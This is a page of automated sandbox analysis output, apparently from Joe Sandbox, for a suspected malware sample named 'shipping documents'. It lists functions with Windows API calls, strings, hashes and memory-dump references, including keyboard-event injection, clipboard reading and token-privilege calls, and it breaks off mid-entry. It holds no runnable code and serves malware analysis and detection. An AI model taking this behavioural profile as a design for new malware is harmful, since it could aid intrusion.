API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: b3e5f8dae3f7ec95c3cde52965e32329eea1c3fa14cbb775abf50c2523c3a00a
Instruction ID: fd8a0e3c83d1613706f46921439d33de8449bf9dd8c556b886933d342f54f112
Opcode Fuzzy Hash: b3e5f8dae3f7ec95c3cde52965e32329eea1c3fa14cbb775abf50c2523c3a00a
Instruction Fuzzy Hash: 82113A31A00305ABCB14FF74CC12FAE73A79F80706F10846DFD42A62C1DE719A899BA4

Function 006901AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 006901BB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 6b6ee8bfcc12385635dcd2a902aa0579ecf0051de69fcb0abbe4d350ee3d5674
Instruction ID: d304b7cee983c03ea9a02ee9f041ac8af915a779ec4b6ba026a7c984955425f0
Opcode Fuzzy Hash: 6b6ee8bfcc12385635dcd2a902aa0579ecf0051de69fcb0abbe4d350ee3d5674
Instruction Fuzzy Hash: 462153B4908341CFCB24DF54C445B5ABBE2BF88304F048A6CF88A4B721D731E849CB62

Function 00674A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00674AD6

Part of subcall function 00678D68: __getptd_noexit.LIBCMT ref: 00678D68

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 7773a10b07b263adebe169d0d3685542bdf4b8bbcb5a2bea4c8ba6b652ce0d4f
Instruction ID: 31516f83fc4fdbd5b6be0ca1998c0046bbe87db9157fd2b194c6446f9dbdcb86
Opcode Fuzzy Hash: 7773a10b07b263adebe169d0d3685542bdf4b8bbcb5a2bea4c8ba6b652ce0d4f
Instruction Fuzzy Hash: E3F081719402099BDFA1AF64880A3DE36A2AF00725F14C618B42C9B1D5DF788E51DF59

Function 00654FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,007162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654FDE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bb718c5dccae89d51dc35288ddf380ee9a6564a7b627b2fc80df9e1ce1a77b20
Instruction ID: 3df429fddd1335733c0f1f3c33e9d6b6641898032136ce34306f0a352d5ef7ee
Opcode Fuzzy Hash: bb718c5dccae89d51dc35288ddf380ee9a6564a7b627b2fc80df9e1ce1a77b20
Instruction Fuzzy Hash: 4CF03071505711CFC7349F68D494852BBE2BF4432A7208ABEE9D782610CB719888DF50

Function 006709D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006709F4

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 74273d05ef19e981e76f921b0462071fca89e541a0b4c186d6fb231921a83678
Instruction ID: 55c90d0f68438f96659c7cf18db68e8c96a4dbd9c7b97c2f3b3d6b942cab9476
Opcode Fuzzy Hash: 74273d05ef19e981e76f921b0462071fca89e541a0b4c186d6fb231921a83678
Instruction Fuzzy Hash: 88E0CD36D0522C57C720E6989C05FFA77EEDF89791F0402B6FC0CD7244E9A09D818694

Function 006B9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 006B914B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 32895b0b4e9b72da8e735b5072ae8056efb51ba59dbee2cd9678a94d5e107100
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: C5E092B0104B009FD7348A28D8107E373E1AB06315F00085DF3AB83341EB6378819759

Function 0067548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00675496

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 321a79a54f7919ba00aacef25d12b1e139d6da22fabb6bb7f6ce743d6346f3ca
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 86B0927684020C77DE412E92EC02A593B5A9B40778F808060FB0C18162E6B3A6A09689

Function 00670E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00670EF7

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: ad835fcbb81e157fe909107c5d3cf64b3826c639d02283417919081c84ef1d8c
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3631B371A00105DFE718DF58D4809A9F7A6FF59300B64CAA5E809CB751D731EDC1CBA0

Function 03BA229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03BA22B1

Memory Dump Source

Source File: 00000000.00000002.2068540502.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ba0000_shipping documents.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 1f5b495c78905e90f407dca33145ea03aa9f503ec5016c3a64786f49a1bc56b0
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: CEE0BF7494420EEFDB00EFB8D5496DE7BB4EF04311F1005A1FD05D7680DB309E548A62

Function 03BA22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03BA22B1

Memory Dump Source

Source File: 00000000.00000002.2068540502.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ba0000_shipping documents.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: db849c2f4279e1bb34de185612bba3c3888d7a181e782b95f034e94a2e56cd4f
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 0DE0E67494420EDFDB00EFB8D54969E7FB4EF04301F1005A1FD01D2280D6309D508A72

Non-executed Functions

Function 006DCDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006DCE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006DCE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 006DCED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006DCF00
SendMessageW.USER32 ref: 006DCF29
_wcsncpy.LIBCMT ref: 006DCFA1
GetKeyState.USER32(00000011), ref: 006DCFC2
GetKeyState.USER32(00000009), ref: 006DCFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006DCFE5
GetKeyState.USER32(00000010), ref: 006DCFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006DD018
SendMessageW.USER32 ref: 006DD03F
SendMessageW.USER32(?,00001030,?,006DB602), ref: 006DD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006DD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006DD16E
SetCapture.USER32(?), ref: 006DD177
ClientToScreen.USER32(?,?), ref: 006DD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006DD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006DD203
ReleaseCapture.USER32 ref: 006DD20E
GetCursorPos.USER32(?), ref: 006DD248
ScreenToClient.USER32(?,?), ref: 006DD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 006DD2B1
SendMessageW.USER32 ref: 006DD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 006DD31C
SendMessageW.USER32 ref: 006DD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006DD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 006DD37B
GetCursorPos.USER32(?), ref: 006DD39B
ScreenToClient.USER32(?,?), ref: 006DD3A8
GetParent.USER32(?), ref: 006DD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 006DD431
SendMessageW.USER32 ref: 006DD462
ClientToScreen.USER32(?,?), ref: 006DD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006DD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 006DD51A
SendMessageW.USER32 ref: 006DD53D
ClientToScreen.USER32(?,?), ref: 006DD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006DD5C3

Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC

GetWindowLongW.USER32(?,000000F0), ref: 006DD65F

Strings

prq, xrefs: 006DD1BD
F, xrefs: 006DD543
@GUI_DRAGID, xrefs: 006DD1AA

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$prq
API String ID: 3977979337-1873520690
Opcode ID: 902dc6de64087c48c6d4649cfd0b9b3d616e51482e4657334823bc9b46e14fe8
Instruction ID: 5dd3c0e93e18b64b08883b9c5b04cd48e1addbd9fb3580dfeef1f1ccaead3dec
Opcode Fuzzy Hash: 902dc6de64087c48c6d4649cfd0b9b3d616e51482e4657334823bc9b46e14fe8
Instruction Fuzzy Hash: 6042AC70A09246AFC721DF28C844EAABBE6FF49324F14451EF696873A0C731D845CF92

Function 006D804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 006D873F

Strings

%d/%02d/%02d, xrefs: 006D8478

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 172d711c470c97d12ef83d8f77277499e7b2510a58d6c8024fd8b62f6b46a913
Instruction ID: 692265eefef6b30f7636085cd901136219cf29ef093e4e11f10a74b90dfab276
Opcode Fuzzy Hash: 172d711c470c97d12ef83d8f77277499e7b2510a58d6c8024fd8b62f6b46a913
Instruction Fuzzy Hash: 6B12A071901244AFEB258F28CC49FAE7BBAEB89710F14412AF916DB3E1DF749941CB50

Function 0066710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006675C2
_memset.LIBCMT ref: 006676B1
_memmove.LIBCMT ref: 00667C4B
_memmove.LIBCMT ref: 00667E4F

Strings

[:<:]], xrefs: 006675F1
\b(?<=\w), xrefs: 006A3C41
Oaf, xrefs: 006A287E
\b(?=\w), xrefs: 006A3C34
DEFINE, xrefs: 006A25AF
0wp, xrefs: 006A1F5B
Q\E, xrefs: 006681C1
[:>:]], xrefs: 0066760A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove$_memset
String ID: 0wp$DEFINE$Oaf$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1062756600
Opcode ID: 9420ef145c8bfde2b98e4e4e22cd63602180d619a2e320e9163c29c337528809
Instruction ID: 7b13a47a6ecf6309277341a8554330e2b7524dfc1ee82f41c633000624e0ae13
Opcode Fuzzy Hash: 9420ef145c8bfde2b98e4e4e22cd63602180d619a2e320e9163c29c337528809
Instruction Fuzzy Hash: D1939071A402169FDB24DF58C891BEDB7B2FF49314F24816AE945AB381E7709E82CF50

Function 00654A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00654A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0068DA8E
IsIconic.USER32(?), ref: 0068DA97
ShowWindow.USER32(?,00000009), ref: 0068DAA4
SetForegroundWindow.USER32(?), ref: 0068DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068DAC4
GetCurrentThreadId.KERNEL32 ref: 0068DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0068DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0068DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0068DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0068DAF8
SetForegroundWindow.USER32(?), ref: 0068DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0068DB10
keybd_event.USER32(00000012,00000000), ref: 0068DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0068DB25
keybd_event.USER32(00000012,00000000), ref: 0068DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0068DB33
keybd_event.USER32(00000012,00000000), ref: 0068DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0068DB42
keybd_event.USER32(00000012,00000000), ref: 0068DB47
SetForegroundWindow.USER32(?), ref: 0068DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0068DB71

Strings

Shell_TrayWnd, xrefs: 0068DA89

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: a283da95ec28ec56eb217c26d8884192a0a22a3b97bbf14cded096752fb23d14
Instruction ID: b55a9e9fd99ba559debae89b5921ce54df1aa38e11636252c72e2141d8c450e0
Opcode Fuzzy Hash: a283da95ec28ec56eb217c26d8884192a0a22a3b97bbf14cded096752fb23d14
Instruction Fuzzy Hash: 2F316571E81318BBEB216F61AC49FBF3F6EEB44B50F154166FA05E61D0C6B05D01ABA0

Function 006A8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 006A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A8D0D
Part of subcall function 006A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8D3A
Part of subcall function 006A8CC3: GetLastError.KERNEL32 ref: 006A8D47

_memset.LIBCMT ref: 006A889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006A88ED
CloseHandle.KERNEL32(?), ref: 006A88FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006A8915
GetProcessWindowStation.USER32 ref: 006A892E
SetProcessWindowStation.USER32(00000000), ref: 006A8938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006A8952

Part of subcall function 006A8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006A8851), ref: 006A8728
Part of subcall function 006A8713: CloseHandle.KERNEL32(?,?,006A8851), ref: 006A873A

Strings

winsta0, xrefs: 006A8910
, xrefs: 006A88AA
default, xrefs: 006A894D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: e0e0b9d558ec3a89580cec6113050ce446ed6e7634214113d618897098433e01
Instruction ID: b920d5347288497bab326a064d5a6168ff8bf9aa1b02b22be418b54f624bc248
Opcode Fuzzy Hash: e0e0b9d558ec3a89580cec6113050ce446ed6e7634214113d618897098433e01
Instruction Fuzzy Hash: 1E816A71901249AFDF11EFA4DC45AEE7BBAEF05304F08412AFA11A7261DB318E14DF60

Function 006C425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(006DF910), ref: 006C4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 006C4292
GetClipboardData.USER32(0000000D), ref: 006C429A
CloseClipboard.USER32 ref: 006C42A6
GlobalLock.KERNEL32(00000000), ref: 006C42C2
CloseClipboard.USER32 ref: 006C42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 006C42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 006C42EE
GetClipboardData.USER32(00000001), ref: 006C42F6
GlobalLock.KERNEL32(00000000), ref: 006C4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 006C4337
CloseClipboard.USER32 ref: 006C4447

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 5f2d01b91d4651d9e7f666dfaadc375b79a02ebc219bfeace2d6be406317f502
Instruction ID: 3f991b01cb5e75f89ede2d0902f5c25b21c506a533c492a71db952c8913d42b7
Opcode Fuzzy Hash: 5f2d01b91d4651d9e7f666dfaadc375b79a02ebc219bfeace2d6be406317f502
Instruction Fuzzy Hash: 5751AF31604301ABD311EF64EC96FBE77AAEF84B01F10452EF956D22A1DF70DA058B66

Function 006BC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006BC9F8
FindClose.KERNEL32(00000000), ref: 006BCA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006BCA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006BCA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 006BCAAF
__swprintf.LIBCMT ref: 006BCAFB
__swprintf.LIBCMT ref: 006BCB3E

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

__swprintf.LIBCMT ref: 006BCB92

Part of subcall function 006738D8: __woutput_l.LIBCMT ref: 00673931

__swprintf.LIBCMT ref: 006BCBE0

Part of subcall function 006738D8: __flsbuf.LIBCMT ref: 00673953
Part of subcall function 006738D8: __flsbuf.LIBCMT ref: 0067396B

__swprintf.LIBCMT ref: 006BCC2F
__swprintf.LIBCMT ref: 006BCC7E
__swprintf.LIBCMT ref: 006BCCCD

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 006BCAF5
%4d, xrefs: 006BCB38
%02d, xrefs: 006BCB86, 006BCB90, 006BCBDE, 006BCC2D, 006BCC7C, 006BCCCB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 6f13521919531b26697fd5cd46208ac050cb25ff41e3644c0d478819b43c3658
